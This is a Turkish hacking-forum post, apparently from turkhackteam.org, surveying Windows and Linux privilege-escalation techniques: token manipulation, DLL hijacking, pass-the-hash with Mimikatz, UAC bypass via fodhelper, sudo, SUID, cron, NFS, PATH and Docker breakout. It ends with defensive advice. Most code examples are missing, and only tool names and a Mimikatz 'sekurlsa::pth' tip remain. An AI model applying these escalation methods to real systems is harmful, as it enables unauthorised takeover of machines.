Kullanılabilecek Araçlar:


>>> Metasploit <<<
>>>
Nessus <<<

Metasploit Örneği:


Token Manipulation (Token Manipülasyonu)

Windows işletim sisteminde süreçler belirli token'larla çalışır. Bu token'lar manipüle edilerek yetki yükseltme sağlanabilir.

Örnek Araç:
Incognito



Exploiting Kernel Vulnerabilities (Çekirdek Zafiyetlerinin İstismarı)

Kernel seviyesindeki zafiyetler, yüksek seviyeli yetki elde etmek için kullanılabilir. Bu zafiyetler, özellikle güncellenmemiş sistemlerde bulunur.

Exploit-DB'den Örnek:



DLL Hijacking (DLL Kaçırma)

Yanlış yapılandırılmış uygulamalar, DLL dosyalarını yanlış yerlerden yükleyebilir. Saldırganlar, kendi kötü amaçlı DLL dosyalarını oluşturup bu uygulamalar tarafından yüklenmesini sağlayabilir.

Örnek Kötü Amaçlı DLL Kodu:



turkhackteam.org // ch

Pass-the-Hash Attacks (Hash ile Kimlik Doğrulama)

Hash'ları kullanarak kimlik doğrulama işlemi gerçekleştirilir. Mimikatz gibi araçlarla bu hash'ları çıkarabilirsiniz.

Mimikatz Örneği:



UAC Bypass (Kullanıcı Hesabı Denetimi Atlatma)

UAC'yi atlatmak için çeşitli teknikler kullanılabilir. Örneğin, fodhelper.exe kullanılarak kayıt defteri manipülasyonu yapılabilir.

Kayıt Defteri Manipülasyonu:



Insecure Service Executables (Güvenli Olmayan Hizmet Yürütülebilir Dosyaları)

Bazı hizmetler güvenli olmayan dizinlerden veya yürütülebilir dosyalardan çalıştırılır. AccessChk aracıyla hizmet yürütülebilir dosya izinlerini kontrol edebilirsiniz.

AccessChk Örneği:



Named Pipe Impersonation (Adlandırılmış Boru Taklidi)

Named pipe'lar, Windows'da süreçler arası iletişim için kullanılır ve kötüye kullanılabilir. Kötü amaçlı bir yazılım, pipe aracılığıyla sistem hizmetlerini taklit edebilir.

Mimikatz Örneği:



Token Duplication (Token Çoğaltma)

Windows token sisteminde, mevcut bir sürecin token'ını kopyalayarak yetki yükseltme gerçekleştirilebilir. Mimikatz aracı bu amaçla kullanılabilir.

Mimikatz Örneği:



Dikkat: "sekurlsa :: pth" komutunu çalıştırırken arasına boşluk koymayınız.


Önleme ve Güvenlik Tavsiyeleri

Güncellemeler ve Yamalar

>> Tüm yazılımları ve işletim sistemini güncel tutarak bilinen zafiyetlerin istismar edilmesini önleyin.
turkhackteam.org // ch

Güvenli Yapılandırmalar

>> Sudoers dosyasını dikkatlice yapılandırın.
>> SUID bit'lerinin yalnızca gerçekten gerekli dosyalarda olmasını sağlayın.
>> Hizmetlerin ve uygulamaların doğru izinlerle çalıştırıldığından emin olun.

Kullanıcı Hakları Yönetimi

>> Kullanıcı haklarını minimum ayrıcalık ilkesine göre verin.
>> Yalnızca gerektiğinde yönetici haklarını kullanın.

İzleme ve Loglama

>> Sistem loglarını düzenli olarak izleyin ve analiz edin.
>> Anormal aktiviteleri tespit etmek için log analiz araçları kullanın.

Uygulama Güvenliği

>> Uygulamalarınızı düzenli olarak güvenlik açıklarına karşı tarayın.
>> Güvenlik duvarları ve anti-virüs yazılımları kullanarak sistemi koruyun.

Saldırı Tespit Sistemleri (IDS) ve İzleme

>> IDS ve IPS (Intrusion Prevention Systems) kullanarak yetki yükseltme denemelerini tespit edin. OSSEC veya Snort gibi açık kaynak IDS araçları kullanılabilir.

Güvenlik Duvarı Kuralları

>> Güvenlik duvarı kurallarını yapılandırarak yalnızca gerekli trafiğe izin verin. iptables veya Windows Firewall kullanarak ağ erişimini kısıtlayın.

Kullanıcı ve Grup Yönetimi

>> Kullanıcı ve grup izinlerini düzenli olarak kontrol edin. Gereksiz kullanıcı hesaplarını ve grupları kaldırın.

Uygulama Whitelisting

>> Yalnızca onaylı uygulamaların çalışmasına izin veren bir whitelisting çözümü kullanın. AppLocker veya SELinux gibi çözümler kullanılabilir.

Güçlü Kimlik Doğrulama ve Parola Politikaları

>> Güçlü parolalar ve çok faktörlü kimlik doğrulama (MFA) kullanarak hesap güvenliğini artırın. Parola politikalarını uygulayarak zayıf parolaların kullanımını önleyin.

Kapsamlı Güvenlik Eğitimleri

>> Kullanıcılara ve sistem yöneticilerine yönelik düzenli güvenlik eğitimleri sağlayın. Güvenlik farkındalığı artırarak sosyal mühendislik saldırılarını önleyin.

turkhackteam.org // ch

Araçlar ve Ek Kaynaklar

Windows Araçları

>> Sysinternals Suite: Gelişmiş sistem yönetim ve izleme araçları sağlar.

44955850


>>
PowerSploit: PowerShell üzerinden saldırı ve yetki yükseltme modülleri içerir.

powersploit-logo.svg

Ek Kaynaklar

>> Exploit Database (Exploit-DB): Güncel exploit'ler ve zafiyetler için kaynak.

d013b9be540d7725fe2a7f6537d0b6c5.jpg

turkhackteam.org // ch
>> OWASP: Güvenlik açıkları ve güvenlik önlemleri hakkında geniş bilgi sunar.

images

turkhackteam.org // ch
Windows sistemlerinde privilege escalation, siber güvenlikte kritik bir zayıf noktadır. Bu zayıflıkları anlamak ve önlemek için sürekli olarak sistemlerinizi güncel tutmalı, doğru yapılandırmalar yapmalı ve güvenlik önlemlerini uygulamalısınız. Hem saldırı tespit sistemleri hem de düzenli eğitimler, bu tür saldırılara karşı korunmada önemlidir.


214883789-1f48e8ab-9de0-4693-b0f2-94f42e433c4f.png

Linux Privilege Escalation

Privilege escalation (yetki yükseltme), bir kullanıcının mevcut yetkilerini artırarak daha yüksek seviyede yetkiler elde etmesini sağlar. Linux işletim sisteminde bu süreç, çeşitli zayıflıklardan ve yanlış yapılandırmalardan yararlanılarak gerçekleştirilebilir.

Sudo Misconfigurations (Sudo Yanlış Yapılandırmaları)

Sudoers File (Sudoers Dosyası)

Yanlış yapılandırılmış sudoers dosyası, saldırganların yetki yükseltme yapmasına neden olabilir. /etc/sudoers dosyasını düzenlerken dikkatli olunmalıdır.
turkhackteam.org // ch
Sudoers Dosyasını Kontrol Etme:


NOPASSWD Option (Şifresiz Çalıştırma)

Bazı komutlar şifresiz çalıştırılabilir. Bu komutları kullanarak yetki yükseltebilirsiniz.

Örnek:



SUID and SGID Binaries (SUID ve SGID İkili Dosyaları)

SUID bit set edilmiş dosyalar, dosyanın sahibi olarak çalıştırılabilir. Bu, saldırganların root hakları elde etmesine neden olabilir.

SUID Dosyalarını Bulma:



turkhackteam.org // ch
Örnek Exploit:


Kernel Exploits (Kernel Zafiyetlerinin İstismarı)

Kernel seviyesindeki zafiyetler, yüksek seviyeli yetki elde etmek için kullanılabilir. Bu zafiyetler, özellikle güncellenmemiş sistemlerde bulunur.

Exploit-DB'den Örnek:



Misconfigured Services (Yanlış Yapılandırılmış Servisler)

Cron Jobs (Cron İşleri)

Yanlış yapılandırılmış cron job'lar yetki yükseltme için kullanılabilir. /etc/crontab ve /etc/cron.d/ dizinlerini kontrol edin.

Cron Dosyasını Kontrol Etme:



Writable /etc/passwd or /etc/shadow (Yazılabilir /etc/passwd veya /etc/shadow Dosyaları)

Bu dosyaların yazılabilir olması büyük bir güvenlik açığıdır. Kullanıcı parolalarını değiştirerek root yetkisi alabilirsiniz.

Exploiting NFS Shares (NFS Paylaşımlarının İstismarı)

Yanlış yapılandırılmış NFS paylaşım izinleri yetki yükseltmeye yol açabilir. showmount -e komutuyla paylaşımları kontrol edin.

NFS Paylaşımlarını Kontrol Etme:



PATH Variable Manipulation (PATH Değişkeni Manipülasyonu)

Yanlış yapılandırılmış PATH değişkeni yetki yükseltmeye neden olabilir. Kullanıcı PATH değişkenini değiştirerek kendi zararlı komutunu çalıştırabilir.

PATH Değişkenini Manipüle Etme:

turkhackteam.org // ch

NFS Shares Exploitation (NFS Paylaşımlarının İstismarı)

NFS paylaşımlarında yanlış izinler yetki yükseltmeye yol açabilir. Root squash özelliği devre dışı bırakılmışsa, istemciler root haklarıyla dosya oluşturabilir.

NFS Paylaşımını Montajlama:



Exploiting Weak Passwords (Zayıf Parolaların İstismarı)

Zayıf veya varsayılan parolalar, sistemdeki diğer kullanıcı hesaplarına erişim sağlar. John the Ripper veya Hydra gibi araçlarla parola kırma işlemleri yapılabilir.

John the Ripper Örneği:



File Capabilities (Dosya Yetenekleri)

Linux'da belirli dosyalara özel yetenekler (capabilities) atanabilir. Yanlış yapılandırılmış yetenekler yetki yükseltmeye yol açabilir.

Yetenekleri Kontrol Etme:



Docker Breakout (Docker Kaçışı)

Docker konteynerleri, ana sisteme erişim sağlamak için kötüye kullanılabilir. Privileged modda çalışan konteynerler özellikle risklidir.

Docker Kaçış Örneği:




Eline Emeğine Sağlık
 

CH

Uzman üye
28 Ocak 2019
1,966
907
Siber
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.